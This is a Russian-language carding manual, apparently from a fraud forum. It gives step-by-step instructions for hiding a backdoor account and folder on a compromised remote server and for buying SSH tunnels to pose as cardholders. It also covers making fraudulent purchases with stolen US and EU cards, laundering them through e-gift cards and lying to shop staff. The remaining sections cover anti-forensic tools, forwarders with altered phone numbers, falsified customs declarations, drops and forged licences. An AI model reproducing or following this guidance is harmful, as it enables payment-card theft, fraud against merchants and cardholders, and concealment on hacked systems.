Для этого заходим в регистр (Пуск > Выполнить > regedit.exe) переходим в
HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAcc. Для начала нам нужно создать свою учётную запись, так как если мы будем проделывать все свои чёрные дела под учёткой админа, то плакал наш дедик как только придёт админ и увидит что творится в его учётке.

Создавать учётку мы будем через командную строку, так как это быстреё и удобнеё. Итак, приступим к созданию учётки:
ountsUserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.
Далее идём в C:\Documents and Settings и скрываем там папку со своим акком со всеми подкаталогами и файлами. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить)
И ещё, создайте себе папку в C:\WINDOWS\system32 или же глубже, и тоже сделайте её скрытой со всеми файлами папками и подкаталогами. Она будет вам нужна для того, чтобы хранить там все нужные вам файлы.
Всё, теперь у вас есть скрытая учётка на дедике и папка, куда вы будете пихать всё своё добро. Можете смело дисконнектиться от дедика и заходить под своей учёткой.

Примечание:
Не стоит на дедик ничего инсталлировать, всё лейте в уже установленном виде.
Делайте это через облачные сервисы или файлообменники.
Т.е. заливайте с основной машины на файлообменники папки с установленным софтом и скачивайте с дедика.


SSH-туннели, как ими пользоваться и где их брать

Здравствуйте братья и сестры!
Наблюдая как люди продают туннели по 1-2 бакса, пароли от которых очень похожи на пароли взятых на данном сайте туннелей, я решил написать статью для нашего клуба.
Статья будет полезна для новичков, а старички возьмут на вооружение данный сайт.
Всем известно что соксы живут очень мало, а дедики стоят дорого, потому рекомендую использовать SSH туннели.
Туннели мы будем брать на сайте http://www.ipsocks.pro/ там приличное количество туннелей и есть выборка под город. К примеру есть тариф 15$ в месяц каждый день можно брать по 50 туннелей, есть как болеё дешевые так и болеё дорогие.
И так качаем программу Bitvise Tunnelier (SSH Client) Далее устанавливаем.
Далее идем на сайт http://www.ipsocks.pro проходим регистрацию и пополняем баланс с помощью WMZ или Perfect money.
Оплату делал WMZ, делается она следующим образом:
Жмем в верхнем углу сайта Account (0Usd) и выбираем способ к примеру Add funds (Web Money) после чего вам будет выдан номер WMZ куда нужно перевести нужную вам сумму.
Перевели деньги на указанный кошелек, жмем Confirm Payment.
Попадаем в меню Add funds to your account.
Ожидаем 10 минут (я ждал около часа) затем вписываем в строку СВОЙ номер кошелька с которого вы делали перевод, сервис их ищет и Далее они зачисляются вам на аккаунт.

Прошу прощения за непонятные картинки, как настроить программу вы можете посмотреть в ВИДЕО под приятную музыку.


E-gift, его вбив и использование

90%+ американских шопов давным давно перестали слать на разные биллинг и шиппинг адреса. Оно и понятно, учитывая, что кардеры уже болеё 20 лет работают по ЮСЕ. По идеё, чтобы пак ушел туда, куда нам нужно, нам следовало бы подменить биллинг и шиппинг адреса, но...

Как вы уже знаете после изучения предыдущих разделов методички, в США работает система ABS, которая сверяет реальный биллинг адрес холдера с адресом указанном при покупке в шопе.
И если вы впишите при покупке неправильный биллинг адрес, то данный ордер 100% не пройдет.
Встает резонный вопрос: как же тогда работать с ЮСА материалом?
Здесь нам в помощь приходит e-Gift (электронная подарочная карта).

e-Gift представляет из себя обычный код из цифр и букв как какой-нибудь купон на скидку и имеёт свой номинал. Простыми словами, это электронная валюта определенного шопа.
Пример того, как выглядит e-Gift: WJ49Y37HH2
Как его использовать будет рассказано чуть ниже.
Вся прелесть в том что при покупке e-Gift нам не нужно указывать физический шиппинг адрес, e-Gift приходит на электронную почту получателя.

Чтобы купить e-Gift нам нужно указать лишь имя и email получателя. Это и будет шиппинг адресом покупки, а непосредственно в процесе оформления этой покупки мы указываем реальный биллинг адрес холдера. Биллинг реальный, АВС не ругается и при хорошем раскладе получаем e-Gift на email
получателя.

ВАЖНО: Не путайте e-Gift card и Gift card.
Gift card представляет из себя аналоговый формат e-Gift и присылается почтой как корреспонденция на физический адрес.

Вбив e-Gift
Чтобы сделать гифт нам понадобятся:
1. USA CC
2. Носок или туннель под билл холдера (в идеале под зип, но можно и под город)
3. 2 Email адреса: один для холдера, один для получателя гифта.
4. Телефон (В идеале скайп с автоответчиком, но если такой возможности нет, то факс под город холдера).
Поэтапная схема работы при покупке гифта:
1. Ставим носок или туннель под холдера
2. Настраиваем время системы
3. Проверяем на whoer.net всё ли так, как нам нужно
4. Заходим в нужный шоп(не переходите по прямому линку, лучше через google, а в идеале через какой-нибудь каталог шопов или любой сторонний ресурс где есть линк на шоп)
5. Не стоит сразу переходить к покупке гифта. 5-7 минут походите по шопу посмотрите товары (ведите себя как покупатель, не тыкайтесь во все разделы, посмотрите какой-нибудь один).
Если в шопе есть рекламный баннер, показывающий нам, что можно приобрести гифт, лучше перейти к покупке именно через него, это будет выглядеть как спонтанное решение, нежели целенаправленное.
6. Переходим к покупке гифта
7. Выбираем номинал
8. Вписываем в графы имена и имейлы отправителя и получателя, так же пишем осмысленное сообщение получателю (не стоит этим пренебрегать). На счет имен надеюсь Вы помните, что
реальные имена холдеров сверить не могут, так что пишем имя, на которое сделан наш email.
9. Переходим к оформлению покупки, где вписываем реальный биллинг адрес холдера (бывают шопы с багами, где при покупке гифтов могут попросить ввести шиппинг адрес, здесь вводим адрес
холдера, но проверьте, точно ли вы покупаете именно электронный гифт, а не физический)

ПОМНИТЕ: Гифт это точно такая же покупка, как и любоя другая, здесь так же не спит система антифрода и успех вашего ордера будет зависеть от того, насколько хорошо вы всё подготовили перед вбивом.
В случае прихода чарджа гифт могут анулировать или развернуть посылку высланную на этот гифт.

Ниже приведен процесс покупки e-Gift на примере шопа ebags.com:

Покупка с e-Gift
Вот мы и получили наш заветный e-Gift!
Вся его прелесть состоит в том, что по сути расплатиться им может кто угодно.
Это значит, что мы заходим в наш шоп, выбираем нужный нам товар и при оформлении покупки указываем уже те биллинг и шиппинг адреса, которые нужны нам, т.е. адреса нашего посредника.
А в конце оформления покупки мы найдя среди способов оплаты оплату гифт картой расплачиваемся не СС, а нашим гифтом.
Чаще всего в шопах при оформлении покупки еще до того как вы дойдете до выбора способа оплаты есть графа "apply gift card" или "apply gift certificate". Если вы видите такую графу, то просто вводите туда код нашего гифта и нажимайте кнопку "apply", если она есть. Начните искать глазами эту графу с момента перехода в корзину. Иногда эта графа присутствует в разделе выбора способа оплаты.


Прямой вбив EU картона

EU материал хорош тем, что американская ABS не может пробить реальный биллинг адрес холдера и
чарджи по таким картам идут до месяца с момента заявления холдером о пропаже средств.
Работа с таким материалом повышает % высыла шопом на разные биллинг и шиппинг адреса, а так
же дает возможность поиграться с биллинг адресом.
Долгий чардж повышает % благополучного прохождения посылки до нашего посредника, в дороге
посылку вряд ли развернут, так как чардж за это время еще не придёт.

Есть два варианта работы с таким материалом:

1) Вбив с разными биллинг и шиппинг адресами.
В этом варианте мы указываем реальный биллинг адрес холдера, а шиппинг адрес указываем посредника. При этом желательно использовать носок или туннель под биллинг адрес, так как некоторые мерчи автоматом лочат транзы, а шопы автоматом бросают ордера в кансел если покупка происходила не из страны выпустившей карту. Если предварительно позвонить в шоп и рассказать
какую-нибудь осмысленную историю, суть которой будет заключаться в том, что вы живете или находитесь в Америке, но карта ваша, к примеру, итальянская и получите добро от шопа на такую
операцию, то можно ставить туннель под шиппинг адрес.
Вообще всегда при такой работе желательно написать в live чат, на email или предварительно прозвонить в шоп и рассказать какую нибудь занимательную историю, сутью которой будет являться
то, что карта выпущена в другой стране, а заказ вам этот нужен.

2) Вбив с биллинг и шиппинг адресом посредника.
При таком вбиве мы указываем билл и шипп посредника. Носок или туннель, соответственно, тоже
ставим под посредника.
Помните, что нужно быть готовым к автоматическому локу транзы, но не нужно уделять этому
особого внимания, а просто быть готовым к такому раскладу.
Здесь так же не помешает предварительно написать или позвонить шопу с занимательной историей.
Так же можно сказать что у карты интернациональный биллинг адрес (т.е. адрес страны вашего нахождения).


Поиск шопов

Поиск магазинов (шопов) можно проводить как в ручном режиме, так и в автоматическом с помощью парсеров.

Работа с поисковиками.
Нам надо:
1. Поисковик (yahoo, google, aol и т.д.)
2. Правильные запросы:
+ Знак Плюс заставит Google обязательно учесть слово, перед которым он стоит, при обработке запроса.
Для правильной фильтрации запроса ,советуем писать запрос в виде shop+e-gift+pay visa, даст запрос магазин с е-гифтом и оплатой Виза.
inurl: Аналогичен оператору allinurl, только производит поиск в адресах страниц одного слова.
Если подставить следующий запрос inurl: - указывает, что искомая нами фраза должна стоят в ссылке/линке/url

Т.е clothes shop+ inurl:e-gift - даст нам список шопов, у которых есть фраза e-gift в ссылке.
Выдаст шопы xxx.com/e-gift

«» Двойные кавычки позволяют найти только то выражение, которое в них содержится.
«clothes shop egift»
site: Ограничивает поиск слов, которые стоят перед оператором, указанным доменом или сайтом.
clothes shop site:.bz - 6удут выданы запросы в.BZ домене.

Запросы можно соеденять в 1 строку.
OR Логическое «ИЛИ» позволяет найти несколько вариантов слов или выражений. Ему соответствует символ «|».
men+clothes inurl:egift OR e-gift OR giftcard site:.com - мужская одежда, поиск по ссылке OR (указание синонимов слова и иx поиск) и поиск в определенном домене
Так же советуем для новичков использовать http://pr-cy.ru/, для определения серьезности шопа. PR должен 6ыть меньше двух.

Работа с парсерами.
Можно искать шопы в автоматическом режиме. С помощью софта.
1. Качаем программу http://www.bibyte.net/node/134, эта прога для примера. Запускаем программу, в
окошке вводим свой ключ (online shop например, или gift card и т.п.), предварительно выбрав
поисковую систему google по usa (там всё интуитивно понятно). Справа выбираем путь, куда будет
сохраняться результат. В настройках не забываем поставить галочку "удалять дубликаты url".
2. Спарсили допустим 700 сайтов этой программой, они сохранились в текстовом документе.
3. Качаем прогу http://netpeak.ru/soft/netpeak-checker/ после установки надо будет зарегать программу — ввести e-mail, на него придет ключ активации.
4. Запускаем Netpeak, в левом меню снимаем все галочки, можно осуществить поиск шопов по "Alexa" или “PR”
5. Нажимаем верхнюю левую кнопку "загрузить" и вставляем туда результат выдачи, которую спарсили прогой в первом-втором пункте. (там будут просто ссылки).
6. Снизу нажимаем "анализировать".
7. После анализа в основном окне нажимаем на табличку "Alexa Rank" или "PR", чтобы прога отсортировала нам сайты по показателю Alexa или PR что бы по пиару. Ну и заходим на все сайты подряд (2 раза нажать по ссылке из окна программы).
Для тех, кто не знает, что такое Alexa. Это некий рейтинг, показатель посещаемости сайта. Чем он ниже (чем меньше цифра) - тем круче и тем большую сайт имеёт посещаемость. Соответственно заходим на сайты с самым большим рейтингом Alexa и по убыванию.

Оговорюсь, что Alexa рейтинг присваивается именно для сайтов одной и той же тематики. Например, сайт интернет магазина с рейтингом 1кк будет иметь меньшую посещаемость, чем сайт интернет магазина с рейтингом 500к, но не факт, что он будет иметь меньшую посещаемость, чем сайт автомобильной тематики с рейтингом 500к.
В общем надо понять, что рейтинг присваивается именно сайтам одной, схожей тематики.
По “PR” Page Rank ищем шопы с пиаром до 2 ( для новичков) чем меньше этот показатель тем “слабеё” безопасность сайта, хотя это тоже не показатель высылают сайты и с большим рангом.

P.S. Даже при конкретном ключе (когда парсим), например "online shop", в выдаче будет куча совсем левых сайтов. Именно поэтому придется много сайтов посещать и делать отбор.


True Crypt/аналоги

TrueCrypt — программа для шифрования файлов и носителей.
Разберем создание TrueCrypt-контейнера с двойным дном и шифрование флешки с помощью TrueCrypt.

ПРИМЕЧАНИЕ: НИ В КОЕМ СЛУЧАЕ НЕ УСТАНАВЛИВАЙТЕ ПРОГРАММУ ВЕРСИИ 7.2 ТАК КАК В БЕЗОПАСНОСТИ ЭТОЙ ВЕРСИИ ЕСТЬ СОМНЕНИЯ!

Создание контейнера с двойным дном.
В первую очередь хочу сказать, что контейнер с двойным дном куда безопасней обычного.
Простыми словами, это один контейнер разделён на две части, к каждой присвоен свой пароль и когда вы соберётесь смонтировать (расшифровать, открыть) контейнер, откроется та его часть, от которой вы введете пароль. Держать основную информацию стоит во втором дне контейнера, так как есть масса способов заставить человека рассказать что угодно и если к вам решат применить эти способы дабы вынудить вас рассказать пароль от контейнера, вы просто скажите пароль от первого дна. В нём советую вам держать вполне осмысленную информацию, которую не стоит видеть чужим глазам, но которая не отправит вас за решётку.

Итак, начнем.
1. Качаем программу версии 7.1а. Устанавливаем и запускаем.
2. В появившемся окне программы кликаем на кнопку "Создать том".
3. Цепочка дальнейших действий:1. В появившемся окне выбираем "Создать зашифрованный файловый контейнер". Далее>
2. Тип тома "Скрытый том TrueCrypt". Далее>>
3. Режим создания тома "Обычный режим". Далее>>
4. Размещение файла: Здесь выбираем папку куда хотим сохранить том (переместить потом его можно будет куда угодно,он будет в виде обычного файла) и имя тома. Далее>>
5. Шифрование внешнего тома: Тут оставляем все как есть. Далее>>
6. Размер внешнего тома: Тут выбираем желаемый размер, выбирайте исходя из того что вы собираетесь в этом контейнере хранить. Далее>>
7. Пароль внешнего тома: Задавайте основной пароль для контейнера (первое дно). Чуть ниже можете поставить галочку "ключ файлы" и справа станет доступна выборка файлов. Ключ файлы это дополнительная степень защиты, т.е. для доступа в том по мимо ввода пароля вам нужно будет еще выбрать ключ файлы (файлы могут быть абсолютно любыми,будь то текстовый документ или порно фильм. Тут важно в последствии эти файлы не потерять,в противном случае про доступ в том можно будет забыть). Далее>>
8. Форматирование внешнего тома: В этом окне задается произвольный код шифрования (просто поводите мышью в пределах этого окна и понажимайте буквы на клавиатуре 20-30 секунд) после чего нажимаем на кнопку "разместить". Внешний том готов. Жмём кнопку Далее>>
9. Скрытый том (второе дно) Далее>>
10. Шифрование скрытого тома: Оставляем все как есть. Далее>>
11. Размер скрытого тома: Здесь задаем размер скрытого тома,размер скрытого тома не может привышать размер внешнего. Далее повторяем все те же действия что и с созданием внешнего тома, с одной лишь поправкой, пароли от томов не должны совпадать. После нажатия кнопки "разместить" всё готово.
12. Теперь переходим в основное окно программы,перед нами список дисков, кликаем один раз на любой из них. Далее жмем на кнопку "файл" она справа внизу выше кнопки "устройство". Идем в ту папку в которой создавали контейнер, выбираем и жмем кнопку "смонтировать". Вводим пороль от внешнего или скрытого тома и жмем кнопку "ок". Всё, мы открыли наш том,теперь в него можно копировать любые файлы. Том так же появляется в виде дополнительного диска в "Моём компьютере". Чтобы закрыть доступ к тому, просто выбирете основном окне программы тот диск который смонтировали и нажмите кнопку "размонтировать".


Шифруем флешку

Процесс шифрования флешки практически идентичен созданию контейнера.
Рассмотрим обычный тип шифрования (без скрытого раздела).

ПРИМЕЧАНИЕ: ФЛЕШКА ПЕРЕД ШИФРОВАНИЕМ ДОЛЖНА БЫТЬ ПУСТА, ТАК КАК В ПРОЦЕССЕ БУДЕТ ОТФОРМАТИРОВАНА.

Цепочка действий:
1. В главном окне программы жмем кнопку "создать том".
2. В появившемся окне выбираем "Зашифровать несистемный раздел/диск". Далее>> Обычный том TrueCrypt. Далее>>
3. Нажимаем на кнопку "устройство" в появившемся списке выбираем нашу флешку. Далее>>
4. Создать и отфарматировать зашифрованный том. Далее>>
5. На этом этапе оставляем все как есть (по умолчанию всегда выбран тип шифрования AES, он считается одним из самых надежных). Далее>>
6. Здесь у нас по умолчанию выбран размер равный размеру флешки. Далее>>
7. Здесь задаем пароль и по желанию ключ-файлы (все как при создании контейнера). Далее>>
8. Водим мышью 20-30 секунд. Ставим галку "быстрое форматирование" в правом верхнем углу.
Жмём кнопку "разместить". Всплывет предупреждающеё нас о том что данные на флешке будут отформатированны, здесь мы упорно настаиваем на форматировании и жмем кнопку "да".
Далее всплывет окно предупреждающеё о том, что нельзя монтировать том на той букве диска (в главном окне truecrypt), которая присвоена флешке. Всё, наша флешка зашифрована, монтировать мы её будем точно так же как и контейнер, с той лишь разницей, что в главном окне программы после выбора диска, на котором будем монтировать, жмём кнопу "устройство", а не кнопку "файл", и соответственно выбираем нашу флешку.
При попытке зайти на флешку обычным путем через "мой компьютер" всплывёт окно, в котором будет сказано, что перед использованием флешку нужно отформатировать. Если принять это условие, то все наши зашифрованные данные будут уничтожены.
Процесс создания скрытого тома на флешке идентичен процессу создания обычного тома.

TrueCrypt, наверное самая популярныя программа в своем классе, в основном благодаря простоте использования и открытому исходному коду. Существует большое колличество аналогов этой программы с разным функционалом. Ознакомиться с преимуществами и недостатками самых достойных аналогов TrueCrypt можно в интернете.


Энциклопедия программного обеспечения кардера

Дисклеймер: Программы из этого списка не являются единственно правильными, ведь практически для любого программного обеспечения всегда найдутся аналогичные решения. Если вам известны болеё удобные или подходящие инструменты чем перечисленные, или если в этом списке чего-то недостаёт, обязательно пишите. Также прошу указывать на любые ошибки и недочёты.

Виртуальные машиныДве самые популярные:
VMware Workstation
Скачать: rutracker.org
Oracle VM VirtualBox
Скачать: rutracker.org
Имеют приблизительно одинаковый функционал, позволяют виртуально эмулировать аппаратное обеспечение ПК.


Браузеры

SRWare Iron — на основе Chromium, предназначен для безопасной и анонимной работы.
Сравнение Iron и обычного Chrome http://www.srware.net/ru/software_srware_iron_chrome_vs_iron.php
Подробнеё: Browser not cookies
Скачать: srware.net

Firefox hybrid — портативная сборка с четырьмя режимами:
ˆ Режим Classic предоставляет пользователю возможность поработать с обычной версией браузера.
ˆ Режим Home избавит вас от всплывающих баннеров и тизеров, которые мешают быстро загружать страницу. abp и ghostery
ˆ Режим Hybrid, оптимизированный режим для улетного серфинга в интернете. abp и ghostery
ˆ Режим Safe, обеспечивает максимальный уровень безопасности пользователя. Все следы работы в браузере удаляются после его закрытия. abp и ghostery
Скачать: xetcom.com

Epic Browser — во многом похож на Iron, но есть еще пару приятных сюрпризов: установка американского прокси одним кликом, встроенная блокировка рекламы, автоматическая блокировка
куков от посторонних сайтов, автоматическое использование HTTPS на всех сайтах, где это поддерживается, и т.д.
Подробнеё: Epic Browser: защищённый браузер на базе Chromium
Скачать: epicbrowser.com

Tor Browser Bundle — позволяет сохранить анонимность в определённых пределах. Использует firefox.
Подробнеё: wikipedia
Скачать: torproject.org

Andy Browser — симбиоз Iron и Tor

Плагины для браузеров:Adblock и Adblock plus — примерно одинаковы, блокируют рекламу.
Ghostery — блокирует следящие за юзером скрипты.
Tamper Data — служит для отслеживания и модификации http/https запросов, поступающих от сайтов.
Cookies Manager — позволит отслеживать, добавлять, редактировать и удалять cookies.
TYC+PR Indicator — отображает в статусной строке браузера (правый нижний угол окна в Firefox) или в панели инструментов (в Chrome) показатели Google Page Rank и Яндекс тИЦ для текущей веб- страницы.
Больше полезных плагинов


Отмывка

CCleaner+Enhancer — всеми знакомая и любимая программа для очистки куков/кешей и другого мусора, а также разрешения проблем регистра.

R-Wipe & Clean — удаляет оставшуюся информацию о работе 600+ приложений, включая Microsoft Office 2007 и Skype

CCtools 7 — позволяет изменять индетификаторы компьютера, хоста, S/N браузера и windows, название процессора и многое другое. Не рекомендуется для вашей основной системы, только для виртуалки (следует также делать её бекап).
STZBlaster — аналог CCTools. Не рекомендуется для вашей основной системы, только для виртуалки (следует также делать её бекап).
BCWipe — обещают стирать файлы без возможности восстановления

Очистка истории RDP-соединений http://winitpro.ru/index.php/2013/05/13/ochistka-istorii-rdp-soedinenij/


Безопасность в сети

Proxifier — must have для анонимности
Bitvise — клиент для SSH-туннелей.
SSHmanager
Plinker — ещё одна альтернатива Bitvise. Функционала нет, коннектит не ко всем туннелям. Она здесь просто для общего развития.
OpenVPN — свободная реализация технологии Виртуальной Частной Сети (VPN) с открытым исходным кодом для создания зашифрованных каналов типа точка-точка или сервер-клиенты между компьютерами.
OpenVPN Protector — защищает от внезапного обрыва связи с VPN чтобы не засветить ваш реальный айпи. На любителя, сам к таковым не отношусь, так как слишком уж глючная эта утилита.
Как вариант: Настройка файрвола для тех же целей.

Jabber+OTR (off-the-record) — джаббер с использованием криптографического протокола OTR для защиты от прослушивания.
Spoiler: Клиенты с встроенной поддержкой OTRКак вариант: Сборка "Параноик+" - Jabber(Psi)+OTR+GPG+Tor-proxy


Шифрование

TrueCrypt — программа для создания зашифрованных разделов, чтобы прятать ваши данные. На данный момент существуют слухи, что их взломали и последняя версия с уязвимостью,
поэтому на выбор.
В любом случае криптоконтейнеры, создаваемые этими программами, расшифровываются специальным софтом.

Необходимое в нашей деятельности всегда есть нужда в хорошем мейлере.
Postbox — удобный, годный почтовый клиент.

Vbivotron 2014 — преобразует информацию из буфера обмена в ручной ввод, имитируя действия живого пользователя. Ставим плюсики m-power!
Имитация рукопашного ввода при вбиве в шоп

TrackChecker — предназначена для упорядочивания ваших посылок, автоматической проверки статуса, имеёт в своем арсенале много почтовых служб.
Скачать для Windows: trackchecker.info
Для Android: plus.google.com; для iOS: itunes.apple.com

KeePassX — свободная программа для хранения паролей.
Скачать: keepassx.org

AV Voice Changer Software — позволяет менять мужской голос на женский, женский на мужской, а также варьировать тембр, доводя голос до неузнаваемости.

Notepad++ — свободный текстовый редактор с открытым исходным кодом. Поддерживает открытие болеё 100 форматов. Создан в основном для программистов. Намного удобнеё, чем обычный блокнот (есть вкладки, нумерация строк и ещё миллион функций).
Скачать: notepad-plus-plus.org

OpenOffice Calc — табличный процессор, входящий в состав OpenOffice.org. Свободный аналог Microsoft Excel. Удобно вести базу вбивов.
Скачать: openoffice.org


Доставка паков и список 286 посредников в 19 странах мира
Список посредников – в отдельных файлах. каждый файл отдельная страна. По каждому посреднику дана полная инфа. всего 286 посредников в 19 странах мира

Доставка паков:
Регистрация на посреднике.
Откройте ваш браузер и наберите www.shopfans.ru.
Регистрируйтесь!
Чтобы получить американский адрес, вам нужно зарегистрироваться на shopfans.ru. Это займет одну минуту и совершенно бесплатно. Кликните на зеленую кнопку "Зарегистрироваться"
Заполните форму регистрации.
Небольшая анкета для того, чтобы мы смогли зарегистрировать ваш аккаунт. Важно использовать латинские буквы, потому что кириллица может некоректно отображаться в системе.
Email
Чтобы вы могли подтвердить регистрацию и своевременно получать обновления статусов ваших посылок, нужно указать действующий email.
Пароль
Придумайте пароль, которым вы будете пользоваться для входа в систему. Пароль нужно будет ввести дважды, чтобы исключить ошибку ввода.
Имя
Здесь - ваше имя
Фамилия
Ваша фамилия
Согласен с Условиями
Перед тем, как ставить здесь галочку, прочитайте Условия работы с Shopfans.
Captcha
Это метод защиты от автоматических регистраций роботами.
Наберите в поле ввода точно такие же символы, как вы видите ниже. Если вам сложно разобрать символы, кликните на "Get a new code", и система сгенерирует новый код.
Это всё! Кликайте на кнопку "Зарегистрироваться"!
Если вы все верно сделали, вы увидите приветственную страницу Shopfans.
Ваш американский адрес.
У вас уже есть адрес для покупок в США. Этот адрес вы будете указывать как shipping address (адрес доставки) при заказах в интернет-магазинах. После того, как магазин отправит вашу покупку на склад
Shopfans и он будет получен складом, вы сможете объединить несколько ваших заказов в одну большую посылку, чтобы существенно сэкономить на доставке. Об этом - дальше в Инструкции.

Разберем полученный адрес. Ваш адрес в США:
Olga Ivanova - Имя на которое вы зарегистрировали аккаунт на посреднике. Как правило пишем русское имя так как к иностранному будут много внимания со стороны посредника. Помним что имя при вбиве не сверяется и его можно писать русское. Для шопа куда бьете русское имя тоже не покажется странным так как ЮСА это страна эмигрантов и там живет очень много русских.
20049 SW 112th Ave - адрес первая строчка Qwintry Suite 73398 – адрес вторая строчка. Обратите внимание что номер 75368 это номер который нам присвоил посредник и как правило именно по нему он определят кому отсортировать посылку когда она поступает на склад. Были случаи когда имя писалось неверно, а посылка все равно попадала в нужный аккаунт. Если вдруг вы видете по трекингу что посылка дошла а она в аккаунте не отображается то пишете запрос скореё всего она попала в неизвестные. Это бывает если магазин
забыл написать ваш уникальный номер или он просто затерся при доставке.
Tualatin, OR 97062 – Город и индекс
Phone 858-633-6353 телефон. Вот тут тоже есть нюанс – как правило надо поменять в телефоне одну или 2 цифры что бы в случае если придёт чардж, а посылка уже доставлена посреднику, то магазин не смог дозвонится до посредника. В конкретном случае с Бандеролькой после того как залочили аккаунт то даже по этому телефону до них не дозвонится.
В ожидании посылок.
После того как вы начнете отправлять посылки на посредника вам как правило придут уведомления на почту с с номером трека о посылке – вам надо отслеживать их.

Посредник обычно сам уведомляет вас о том что посылка пришла на склад и с этого дня начинается исчисляется время хранения посылки. Обычно бесплатный период у всех разный от 30 до 60 дней.
После этого идет платное хранение. Но это не наш случай нам необходимо отправить посылку как можно раньше что бы её не успели заблокировать.

Посылки пришли, что дальше?
Подготовка заказа к отправке.
Вы самостоятельно, в личном кабинете выбираете оплату услуг склада по обработке заказа, которая Вам больше подходит. Далее, в зависимости от выбранной оплаты, Вам будут предоставлены дополнительные услуги по обработке заказа: «Фото содержимого», «Проверка содержимого», проверка на брак, проверка размер. Данные услуги осуществляются на платной основе. Объединение нескольких заказов в одну посылку также зависит от выбранной Вами оплаты. После этого Вам необходимо заполнить декларацию, выбрать способ доставки, а также решить хотите ли Вы застраховать заказ.
При отправке обычной почтой, а не почтой посредника декларация заполняется достаточно просто – пишете название вещи на анг языке – колво и сумму.
На данный момент стоимость посылки не может превышать 1000 евро на человека в месяц. Нам приходится обходить эти ограничения следующими способами.

1. Мы пишем в декларации не полное наименование товара – что бы на таможне не смогли определить точную стоимость. например если это техника.
2. Указать что товар б/у и соответственно стоимость его ниже нового товара.
3. Если тправляем одежду то можем занизить стоимость никто её сверять на таможне не будет. Для всего этого у посредника есть функция УБРАТЬ ИНВОЙС!

Таможенное декларирование международных почтовых отправлений и таможенные пошлины, налоги. Перечень товаров для личного пользования, ограниченных к пересылке в международных почтовых отправлениях. Перечень товаров для личного пользования, запрещенных к пересылке в международных почтовых отправлениях.

Оплата услуг посредника
Пользователь оплачивает Услуги Посредников в долларах США согласно действующим Тарифам путём перевода денежных средств на Счет Пользователя в системе посредника.
Посредник списывает денежные средства со Счета Пользователя за оказанные Услуги и почтовые расходы (в момент отправления Посылки).
Остаток на Счете Пользователя может быть использован для оплаты Услуг Посредника перевод денежных средств может быть осуществлен банковским переводом, перечислением на счет Paypal, или путем оплаты банковской пластиковой картой ( в нашем случае мы используем виртуальный карту киви! Некоторые посредники принимают яндекс деньги и киви. В зависимости от вида оплаты Посредник как правило начисляет комиссию, направленную на компенсацию расходов, связанных с перечислением денежных средств и их конвертации в доллары США. Комиссия взимается как процент от переведенной суммы и всегда указана в разделе Тарифы.
Как правило при оплате популярными средствами оплаты зачисление денежных средств на аккаунт происходит мгновенно, при пополнении счета путем банковского перевода зачисление на Счет Пользователя происходит в течение трех рабочих дней

Способы доставки в Россию. Отправление заказа.
После того, как Вы подготовили и указали все нужные действия, которые хотите произвести с заказом, а также оплаты всех услуг склада, Ваш заказ обрабатывается сотрудниками и передается службе доставки. Хотим заметить, что Вы можете вносить какие-либо изменения в заказ до момента, пока Вы не оплатили ту или иную услугу. Отслеживание посылок из США Вы можете произвести на сайте usps.com или emspost.ru. Теперь остается только ожидать доставку посылок из США.
Что делать если посылку всё-таки заблокировали?
Посредник обычно просит прислать следующие документы.
По вашей отправке возникли некоторые вопросы. Бандеролька уделяет большое внимание безопасности, в связи с этим мы просим вас в течение 48 часов предоставить следующие документы:
1. Копии двух официальных документов, удостоверяющих вашу личность.
2. Копии двух официальных документов, удостоверяющих личность и место проживания владельца кредитной карты, с помощью которой оплачивались ваши покупки и услуги Бандерольки.
3. Вашу фотографию (в анфас при хорошем освещении) с вашим паспортом в развернутом виде.
4. Полную контактную информацию (адрес и телефон) владельца кредитной карты.
5. Копию лицевой и оборотной стороны кредитной карты (с закрашенными восемью цифрами в середине номера карты).
6. Копии выписок из банковского счета, подтверждающих факт оплаты товара и услуг Бандерольки.
Сканированные копии документов должны быть отправлены по адресу [email protected] и [email protected], они нужны для подтверждения легальности ваших покупок.
В том случае, если мы не получим документы, ваш аккаунт на сайте Бандерольки будет заблокирован, и вы будете лишены возможности пользоваться нашим сервисом. Спасибо за понимание.

Как показала практика вы уже свой стафф не вытащите проще забить и работать дальше но на форуме есть и те кто через саппорт все таки разблокировал свои посылки тут уже как повезет.

Получение заказа.
Через 10-30 дней, в соответствии с выбранным способом доставки, посылка из США будет доставлена до Ваших дверей или до отделения почты. Если Вы выбрали способ доставки Express Mail, то почтальон доставит посылку непосредственно к Вам домой. Посылки, отправленные через Priority Mail или First Mail Class, нужно будет получить в Вашем почтовом отделении. Обычно Вам должно прийти уведомление о поступлении посылки. Для получения необходимо предъявить Ваш паспорт.
Варианты получения посылки в Росии и примерные цены
1. Вы отправили на своего дропа и он её получает и отдаёт Вам (стоимость 300-1000 рублей).
2. Вы воспользовались услуми дроповода - он принимает и пересылает посылку уже на ваш адрес (стоимость 500- 1000 рублей + добавляется стоимость пересыла посылки по России до вас).
3. Вы сами можете получить посылку у курьера на имя дропа если умеёте нормально общатся. Как правило курьер привозит посылку и у него задача одна доставить посылку. Вы можете показать копию паспорта дропа и сказать что он в отъехал срочно и попросил вас получить. Из примера – отправляю на адрес бизнес центра на разные данные дропа – забираю сам вопросов ещё ни возникало. Или вы можете заказать документ водительские права у соклубника rullit и получать по ним.

Работа с дроповодами.
В клубе есть замечательный сервис – приём посылок в Америке дропами.
Вот основные возможности!
Основные две функции сервиса:
1) Пересылка вашего "хорошего" товара в РУ/ Украину и т.д.
2) Безопастность вашего ФИО и адреса, т.е. можно слать прямо на себя домой.
О нашем сервисе:
Мы зарегистрировали ОФИЦИАЛЬНУЮ компанию в США по пересылке товаров за рубеж, аналогично шопфанс и т.д.
И мы будем работать по всем правилам пересылки, с небольшими дополнениями с учетом нашей специфики.
А именно:
По закону мы обязаны передать посылку и всю имеющуюся у нас информацию о получателе в полицию по первому требованию магазина или полиции.
Такую информацию как: адрес, ФИО, данные карты или иных платежных средств с которых был произведён расчёт с нами, за наши услуги.
Что мы можем сделать в такой ситуации? Нам необходимо отправить вашу посылку ДО контакта с нами магазина или полиции.
В таком случае мы передаем полицейским чек за оплату услуг почты (в котором есть только дата и время отправления, вес посылки и сумма) и ИНФО о получателе.

Суть нашей работы с Вами:
Вы заказываете товар на наш адрес самой быстрой доставкой (овернайт).
